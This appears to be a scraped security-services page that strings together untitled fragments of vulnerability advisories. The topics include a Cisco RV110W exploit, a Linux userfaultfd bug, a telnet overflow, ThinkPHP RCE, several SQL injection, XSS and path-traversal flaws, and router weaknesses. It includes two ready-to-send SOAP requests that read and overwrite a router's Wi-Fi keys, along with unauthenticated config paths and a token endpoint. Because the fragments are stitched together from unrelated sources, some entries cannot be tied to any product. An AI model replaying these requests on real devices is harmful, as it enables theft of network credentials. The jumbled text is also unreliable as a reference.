This exploit allows an attacker to gain access to the credentials of the Cisco RV110W router and execute OS commands on the device.
Using the userfaultfd API, it is possible to first register a userfaultfd region for any VMA that fulfills vma_can_userfault(): It must be an anonymous VMA (->vm_ops==NULL), a hugetlb VMA (VM_HUGETLB), or a shmem VMA (->vm_ops==shmem_vm_ops). This means that it is, for example, possible to register userfaulfd regions for shared readonly mappings of tmpfs files. Afterwards, the userfaultfd API can be used on such a region to (atomically) write data into holes in the file's mapping. This API also works on readonly shared mappings. This means that an attacker with read-only access to a tmpfs file that contains holes can write data into holes in the file.
GNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment variable handling which can be exploited to escape restricted shells on embedded devices. Most modern browsers no longer support telnet:// handlers, but in instances where URI handlers are enabled to the inetutils telnet client this issue maybe remotely triggerable. A stack-based overflow is present in the handling of environment variables when connecting telnet.c to remote telnet servers through oversized DISPLAY arguments. A heap-overflow is also present which can be triggered in a different code path due to supplying oversized environment variables during client connection code.
A remote code execution vulnerability exists in ThinkPHP 5.x below v5.0.23,v5.1.31. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a payload that will execute arbitrary code on the server.
A vulnerability exists in WP AutoSuggest 0.24, where an attacker can inject malicious SQL queries via the 'wpas_keys' parameter in the 'autosuggest.php' file. An attacker can exploit this vulnerability by using a tool such as sqlmap to inject malicious SQL queries and gain access to the database.
Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net. The 'id_utente_mod' parameter is vulnerable to SQL Injection vulnerability.
A Stored Cross Site Scripting vulnerability is found in the 'Text Data' Field within the 'ViewForumMessage' section. This is because the application does not properly sanitise the users input.
The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested. The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.
POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 288 Connection: close Content-Type: text/xml; charset=”utf-8″ SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys” 1 <?xml version=”1.0″ encoding=”utf-8″?> <s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″></u:GetSecurityKeys></s:Body></s:Envelope> and POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 496 Connection: close Content-Type: text/xml; charset=”utf-8″ SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys” <?xml version=”1.0″ encoding=”utf-8″?> <s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:SetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server. By sending a simple GET request without authentication cookie one can get see valid responses. Other resources accessible are: /config/dialup/config.xml, /config/global/config.xml, /config/global/net-type.xml, /config/lan/config.xml, /config/pcassistant/config.xml, /config/voice/config.xml, /config/wifi/configure.xml. It was also observed that an unauthenticated user can generate “SessionID” and “__RequestVerificationToken” by simply sending an HTTP GET request to “/api/webserver/SesTokInfo”. These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.
Services By CQR